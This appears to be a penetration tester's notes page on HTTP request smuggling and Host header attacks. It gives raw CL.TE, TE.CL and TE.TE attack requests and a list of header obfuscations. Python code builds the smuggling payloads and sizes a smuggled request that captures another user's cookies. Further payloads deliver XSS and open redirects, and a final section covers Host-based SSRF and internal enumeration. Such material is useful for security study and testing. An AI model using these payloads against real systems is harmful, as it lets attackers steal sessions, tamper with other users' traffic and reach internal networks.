# HTTP

## HTTP Smuggling

A request smuggling vulnerability arises because HTTP/1.1 offers two ways to state where a request body ends: the `Content-Length` header (an explicit byte count) and `Transfer-Encoding: chunked` (the body is sent as a series of length-prefixed chunks terminated by a zero-length chunk). When the front end server and the back end server honour different headers, the front end forwards bytes that the back end treats as the beginning of the *next* request on the same connection, so an attacker can prepend ("smuggle") content onto another user's request.

Example of a chunked request (`b` is the chunk size in hex, 11 bytes of data follow; the `0` chunk ends the body and must itself be followed by an empty line)

```
POST ... HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b    #chunk size in hex (0xb = 11 bytes of data)
<body>
0    #zero-length chunk: end of the body, followed by an empty line
```

#### CL.TE Exploit

Front end uses `Content-Length`, back end uses `Transfer-Encoding`. The front end forwards the whole body (`Content-Length` bytes); the back end stops at the zero-length chunk, so `STRING HERE` stays on the connection and becomes the start of the next request it parses.

```
POST / HTTP/1.1
Host: <website>
Content-Length: 16    #every byte after the blank line: "0\r\n" (3) + "\r\n" (2) + "STRING HERE" (11)
Transfer-Encoding: chunked

0

STRING HERE
```

If the smuggled prefix collides with the victim's headers (for example the back end rejects the merged request because `Host` appears twice), smuggle a complete request of your own with its own `Content-Length` and a body that begins with a parameter name: the victim's request line and headers are then consumed as the value of that parameter instead of being parsed as headers

```
POST / HTTP/1.1
Host: <website>
Content-Length: <len>    #bytes from the "0" line to the end of "x=" inclusive
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Host: <website>
Content-Type: application/x-www-form-urlencoded
Content-Length: 10    #how many bytes of the victim's request get swallowed into this body

x=    #the victim's request line and headers land here as the value of x
```

#### TE.CL Exploit

Front end uses `Transfer-Encoding`, back end uses `Content-Length`. The front end reads the chunked body up to the zero-length chunk and forwards all of it; the back end reads only `Content-Length` bytes (just the chunk-size line) and parses everything after it as the next request. Note that the trailing `0\r\n\r\n` is part of those leftover bytes too, so a smuggled request normally carries its own `Content-Length` that covers them, otherwise they are prepended to the victim's request.

```
POST / HTTP/1.1
Host: <website>
Content-Length: 3    #only the chunk-size line "b\r\n" (3 bytes)
Transfer-Encoding: chunked

b                    #chunk size: length of STRING HERE in hex (11 = 0xb)
STRING HERE
0
[\r\n\r\n]           #the zero chunk is followed by an empty line: "0\r\n\r\n"
```
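To make the length arithmetic of the CL.TE and TE.CL requests above concrete, here is an added example (not code from the original notes): it builds both payloads with their `Content-Length` and chunk size computed, and then feeds the same bytes to a toy Content-Length-only parser and a toy chunked-only parser to show what each one consumes and what it leaves on the connection for the "next" request. The host name `example.test` and the smuggled string are placeholders.

```python
# Added example (not from the original notes): build CL.TE and TE.CL requests
# with their lengths computed, then show what a Content-Length-only parser and
# a Transfer-Encoding-only parser each consume from the same bytes. The host and
# the smuggled string are placeholders chosen for the demonstration.

CRLF = b"\r\n"


def build_cl_te(host, smuggled):
    """CL.TE payload: Content-Length covers "0\\r\\n\\r\\n" plus the smuggled
    bytes. A CL-only front end forwards all of it; a TE-only back end stops at
    the zero-length chunk and keeps `smuggled` as the start of the next request."""
    body = b"0" + CRLF + CRLF + smuggled
    return (
        b"POST / HTTP/1.1" + CRLF
        + b"Host: " + host + CRLF
        + b"Content-Length: " + str(len(body)).encode() + CRLF
        + b"Transfer-Encoding: chunked" + CRLF
        + CRLF
        + body
    )


def build_te_cl(host, smuggled):
    """TE.CL payload: the chunk size is the hex length of `smuggled` and
    Content-Length is only the chunk-size line. A TE-only front end forwards the
    whole chunked body; a CL-only back end reads just the size line and treats
    `smuggled` (plus the trailing zero chunk) as the next request."""
    size_line = format(len(smuggled), "x").encode() + CRLF
    body = size_line + smuggled + CRLF + b"0" + CRLF + CRLF
    return (
        b"POST / HTTP/1.1" + CRLF
        + b"Host: " + host + CRLF
        + b"Content-Length: " + str(len(size_line)).encode() + CRLF
        + b"Transfer-Encoding: chunked" + CRLF
        + CRLF
        + body
    )


def split_message(raw):
    """Return (request line, headers as a lower-cased dict, raw body bytes)."""
    head, body = raw.split(CRLF + CRLF, 1)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def cl_view(raw):
    """A server honouring only Content-Length: (body it accepts, bytes left on
    the connection, which it will parse as the next request)."""
    _, headers, body = split_message(raw)
    n = int(headers.get(b"content-length", b"0"))
    return body[:n], body[n:]


def te_view(raw):
    """A server honouring only Transfer-Encoding: chunked: (decoded body, bytes
    left on the connection). Trailer fields after the zero chunk are not handled."""
    _, _, body = split_message(raw)
    decoded, pos = b"", 0
    while True:
        end = body.index(CRLF, pos)
        size = int(body[pos:end], 16)
        pos = end + 2                       # past the size line
        if size == 0:
            return decoded, body[pos + 2:]  # skip the empty line after "0"
        decoded += body[pos:pos + size]
        pos += size + 2                     # chunk data and its trailing CRLF


if __name__ == "__main__":
    for name, req in (("CL.TE", build_cl_te(b"example.test", b"STRING HERE")),
                      ("TE.CL", build_te_cl(b"example.test", b"STRING HERE"))):
        print(name, "CL leftover:", cl_view(req)[1], "TE leftover:", te_view(req)[1])
```

Whichever view reports leftover bytes is the server that will misparse the next request on the connection; the other view consumed everything. Against a real target you would send the raw bytes over a socket with keep-alive, since an HTTP client library will normalise the headers away.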

#### TE.TE Exploit

Both the front end and the back end honour `Transfer-Encoding`, but one of them can be made to ignore the header (and fall back to `Content-Length`) by obfuscating it. Depending on which server stops honouring it, the request then behaves as CL.TE or TE.CL. Variants to try (each is usually sent together with a plain `Transfer-Encoding: chunked`; `[\t]` and `[\n]` stand for a literal tab and a bare line feed)

```
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[\t]chunked
 Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

Complete request (this is the TE.CL form, i.e. for the case where the back end is the one that drops the obfuscated header; if the front end drops it, use the CL.TE form instead)

```
POST / HTTP/1.1
Host: <website>
Content-Length: 3    #only the chunk-size line "b\r\n" (3 bytes)
Transfer-Encoding: chunked
<obfuscated transfer encoding header>

b                    #chunk size: length of STRING HERE in hex (11 = 0xb)
STRING HERE
0
[\r\n\r\n]           #the zero chunk is followed by an empty line: "0\r\n\r\n"
```
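TE.TE works only when the two servers normalise headers differently. The following added example (not from the original notes) models two header parsers, one strict (RFC 7230 token rules, CRLF only, the last transfer coding must be exactly `chunked`) and one lenient (any line ending, whitespace trimmed everywhere, `chunked` anywhere in the value), and runs them over the obfuscated variants listed above. The variants where the two disagree are the ones that would desync a front end / back end pair behaving like these two parsers; both parsers are constructed for illustration, not taken from any real server.

```python
# Added example (not from the original notes): a strict and a lenient header
# parser run over the Transfer-Encoding obfuscations from the list above. Both
# parsers are toy models written for this demonstration.
import re

CRLF = b"\r\n"
TOKEN = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")  # RFC 7230 tchar set

VARIANTS = [  # the list from the notes, as raw header bytes
    b"Transfer-Encoding: xchunked\r\n",
    b"Transfer-Encoding : chunked\r\n",
    b"Transfer-Encoding: chunked\r\nTransfer-Encoding: x\r\n",
    b"Transfer-Encoding:\tchunked\r\n",
    b" Transfer-Encoding: chunked\r\n",
    b"X: X\nTransfer-Encoding: chunked\r\n",
    b"Transfer-Encoding\r\n: chunked\r\n",
]


def strict_is_chunked(header_block):
    """Roughly what RFC 7230 demands: CRLF line endings only (a bare LF makes a
    strict server reject the message; counted here as "not chunked"), no
    whitespace between field name and colon, a header name that is a valid
    token, and the *final* transfer coding after combining duplicates must be
    exactly "chunked". Lines starting with whitespace are obs-fold continuations
    and never start a new header."""
    if b"\n" in header_block.replace(CRLF, b""):
        return False
    codings = []
    for line in header_block.split(CRLF):
        if not line or line[:1] in (b" ", b"\t"):
            continue
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.match(name):
            continue
        if name.lower() == b"transfer-encoding":
            codings += [c.strip(b" \t").lower() for c in value.split(b",")]
    return bool(codings) and codings[-1] == b"chunked"


def lenient_is_chunked(header_block):
    """A forgiving parser of the kind found in the wild: any line ending,
    whitespace trimmed from name and value, "chunked" anywhere in the value."""
    for line in re.split(rb"\r?\n", header_block):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"transfer-encoding":
            if b"chunked" in value.strip().lower():
                return True
    return False


def desync_candidates(variants):
    """Variants the two parsers disagree on: each one desyncs a front end /
    back end pair that behaves like the strict and the lenient parser."""
    return [v for v in variants if strict_is_chunked(v) != lenient_is_chunked(v)]


if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v!r:55} strict={strict_is_chunked(v)!s:5} lenient={lenient_is_chunked(v)}")
```

Not every variant separates these two particular parsers (the tab before `chunked` is legal whitespace for both), which mirrors real testing: each obfuscation has to be tried against the actual pair of servers, and the ones that produce a timeout or a changed response are the ones worth building the full request around.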

### Reflected XSS

Smuggling lets you deliver a reflected XSS payload in a place a victim's browser would never put it for you, such as a request header (`User-Agent` is a common target). The smuggled request is prepended to the next user's request, so the payload fires in that user's response without any action on their part

```
POST / HTTP/1.1
Host: <target>
Content-Length: <len>    #bytes from the "0" line to the end of the last smuggled header
Transfer-Encoding: chunked

0

GET / HTTP/1.1
<header>: <XSS>
Foo: X    #no line break after this header: the victim's request line is appended to its value
```

### Open redirect

Many servers build redirects from the `Host` header (for example when adding a trailing slash to `/home` or upgrading HTTP to HTTPS). A smuggled request with an attacker-controlled `Host` makes the next user receive a redirect to that host, which their browser follows

```
POST / HTTP/1.1
Host: <target>
Content-Length: <len>    #bytes from the "0" line to the end of the last smuggled header
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: <redirect to>
Foo: X    #no line break after this header: the victim's request line is appended to its value
```

### Reflect a user's request as the value of a parameter

Smuggle a request that submits a form, but give it a `Content-Length` larger than the body you actually send. The back end completes that body with the beginning of the next user's request (request line, headers, cookies, tokens), which the application stores as the parameter's value and can then be read back wherever the application displays it

```
POST / HTTP/1.1
Host: <target>
Transfer-Encoding: chunked
Content-Length: <len>    #bytes from the "0" line to the end of "<param>=" inclusive

0

POST <req> HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: <len>    #larger than the body below; the difference is filled with the victim's request

<param>=
```

The inner `Content-Length` controls how much of the victim's request is captured: too small and you only get the request line, too large and the back end waits for bytes that never arrive and the request times out. Start small and increase it until the cookies or tokens you want are included.

For instance, if the application stores a message via `/save?username=usr&msg=text` (or the equivalent POST form), the following payload stores the next user's request as `msg`; read it back by navigating to the page where the message is displayed

```
POST / HTTP/1.1
Host: <target>
Transfer-Encoding: chunked
Content-Length: <len>    #bytes from the "0" line to the end of "msg=" inclusive

0

POST /save HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: <len>    #larger than "username=usr&msg="; the excess is filled with the victim's request

username=usr&msg=
```
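How the inner `Content-Length` decides what gets captured is easiest to see by simulating the back end. The following added example (not from the original notes) builds the smuggled `/save` request with a chosen capture length, appends a constructed victim request to it the way the back end would see the two on one connection, and parses the result as a Content-Length back end and a form handler would. The outer CL.TE wrapper is the one shown above and is left out here; host, path, parameter names and the victim's request are all constructed for the demonstration.

```python
# Added example (not from the original notes): sizing the Content-Length of the
# smuggled request so that the victim's request is stored as a form parameter.
# Host, path, parameter names and the victim request are constructed samples.

CRLF = b"\r\n"


def build_capture_prefix(host, path, form_prefix, capture_len):
    """The request the back end sees first. Its Content-Length is deliberately
    `capture_len` bytes longer than `form_prefix`, so the back end keeps reading
    the next request on the connection (the victim's) as the rest of this body."""
    return (
        b"POST " + path + b" HTTP/1.1" + CRLF
        + b"Host: " + host + CRLF
        + b"Content-Type: application/x-www-form-urlencoded" + CRLF
        + b"Content-Length: " + str(len(form_prefix) + capture_len).encode() + CRLF
        + CRLF
        + form_prefix
    )


def backend_view(stream):
    """What a Content-Length back end makes of the bytes on the connection:
    (path, body) of the first request, or None while it is still waiting for
    bytes that never arrive (Content-Length too large: the request hangs)."""
    head, _, rest = stream.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    path = lines[0].split(b" ")[1]
    length = 0
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    if len(rest) < length:
        return None
    return path, rest[:length]


def parse_form(body):
    """Minimal application/x-www-form-urlencoded parser without percent-decoding,
    so the captured request comes back byte for byte. An '&' inside the victim's
    request would end the captured value here, as it would in a real application."""
    fields = {}
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        fields[name] = value
    return fields


def captured_msg(prefix, victim_request):
    """The value stored in `msg` once the victim's request has been appended."""
    parsed = backend_view(prefix + victim_request)
    if parsed is None:
        return None
    _, body = parsed
    return parse_form(body).get(b"msg")


VICTIM_REQUEST = (  # constructed sample, not captured traffic
    b"GET /account HTTP/1.1" + CRLF
    + b"Host: vulnerable-website.com" + CRLF
    + b"Cookie: session=0123456789abcdef" + CRLF
    + CRLF
)

if __name__ == "__main__":
    for capture_len in (60, 87, 500):
        prefix = build_capture_prefix(b"vulnerable-website.com", b"/save",
                                      b"username=usr&msg=", capture_len)
        print(capture_len, captured_msg(prefix, VICTIM_REQUEST))
```

With 60 extra bytes the stored message ends in the middle of the `Cookie` header name; 87 takes the whole cookie line; 500 exceeds what the victim sends, so the back end never finishes reading and the attack silently fails. In practice the smuggled prefix is followed by whatever the next request happens to be, so the captured value also tells you which user you hit.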

## Host Header Attacks

The `Host` header tells load balancers and front end servers which virtual host or back end a request is meant for. When its value is trusted for routing or for building URLs, tampering with it can lead to SSRF. To probe how the Host header is handled, try the following and compare each response with that of a legitimate request

* Send an arbitrary host
* Check whether only the host name is validated and not the port, e.g. `hostsite.com:evil`
* Check for loose domain matching by sending a look-alike of an accepted domain, e.g. `evil-hostsite.com` or `evilhostsite.com`
* Send two Host headers with different values; different components may pick different ones
* Add whitespace (spaces or tabs) before the header name, around the colon or around the value
* Put an absolute URL in the request line (`GET http://<target>/ HTTP/1.1`) while sending a different Host; servers may prioritise one over the other

### Header overwrite

It is possible to override the value the application uses as Host by adding one of the following headers to the request; front ends and frameworks often trust them on the assumption that only a proxy sets them

```
X-Forwarded-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
```
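The probes in the list above and the override headers in this section all exploit the same kind of shortcut in Host validation. As an added example (not from the original notes), here is a weak check built from those shortcuts beside a strict one, both run over the listed probes. The allowlist, `hostsite.com` and the attacker host `evil.example` are placeholders; headers are passed as raw `(name, value)` pairs as a parser would deliver them, and `from_trusted_proxy` stands for whatever the deployment uses to know the request came through its own proxy.

```python
# Added example (not from the original notes): a weak Host check of the kind the
# probes above defeat, beside a strict one, run over those probes. The allowlist,
# 'hostsite.com' and 'evil.example' are placeholders; headers are raw
# (name, value) pairs.

ALLOWED_HOSTS = {b"hostsite.com", b"www.hostsite.com"}


def weak_effective_host(headers):
    """Shortcuts seen in real deployments: header names are trimmed, the first
    Host is "validated" with endswith() after chopping at the first colon, but
    the value later used to build URLs is the last Host seen, or X-Forwarded-Host
    if present, whoever set it. Returns the host the app would use, or None."""
    first = last = forwarded = None
    for name, value in headers:
        n = name.strip().lower()
        if n == b"host":
            last = value.strip()
            if first is None:
                first = last
        elif n == b"x-forwarded-host":
            forwarded = value.strip()
    if first is None or not first.split(b":")[0].endswith(b"hostsite.com"):
        return None
    return forwarded or last


def strict_effective_host(headers, from_trusted_proxy=False):
    """Exactly one Host header (names compared untrimmed), X-Forwarded-Host
    honoured only when the request arrived through our own proxy, host and port
    parsed separately, host matched exactly against the allowlist."""
    hosts = [v for n, v in headers if n.lower() == b"host"]
    if len(hosts) != 1:
        return None
    host = hosts[0]
    if from_trusted_proxy:
        forwarded = [v for n, v in headers if n.lower() == b"x-forwarded-host"]
        if forwarded:
            host = forwarded[-1]
    host = host.strip(b" \t").lower()
    name, sep, port = host.partition(b":")
    if sep and not (port.isdigit() and 0 < int(port) < 65536):
        return None
    if name not in ALLOWED_HOSTS:
        return None
    return host


PROBES = {  # constructed from the list above
    "legitimate": [(b"Host", b"www.hostsite.com:443")],
    "arbitrary host": [(b"Host", b"evil.example")],
    "port not validated": [(b"Host", b"hostsite.com:evil")],
    "look-alike subdomain": [(b"Host", b"evil-hostsite.com")],
    "look-alike domain": [(b"Host", b"evilhostsite.com")],
    "duplicate Host": [(b"Host", b"hostsite.com"), (b"Host", b"evil.example")],
    "space after name": [(b"Host ", b"hostsite.com"), (b"Host", b"evil.example")],
    "override header": [(b"Host", b"hostsite.com"), (b"X-Forwarded-Host", b"evil.example")],
}


def compare(probes=PROBES):
    """{probe: (host the weak check lets through, host the strict check lets through)}"""
    return {k: (weak_effective_host(v), strict_effective_host(v)) for k, v in probes.items()}


if __name__ == "__main__":
    for k, (weak, strict) in compare().items():
        print(f"{k:22} weak={weak!r:28} strict={strict!r}")
```

Every probe except the plain arbitrary host gets an attacker-controlled value past the weak check, while the strict check lets only the legitimate request through and, for the override probe, keeps using the real `Host`. The part that matters on the server side is the last step: whatever the validator accepted must be the exact value used for routing and URL building, not a different header read later.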

### SSRF

If the front end routes on the Host header, controlling it lets you reach other hosts on the target's internal network. To verify, replace the Host value with a host you control (for example a DNS or HTTP logging endpoint) and wait for a connection from the target or from another machine in its network. If one arrives, the front end forwards based on Host and you can enumerate internal machines with a brute force or dictionary attack on host names and IP addresses. Compare the responses: a host that exists typically answers differently (for instance with a 3XX redirect or a distinct error page) from one that does not
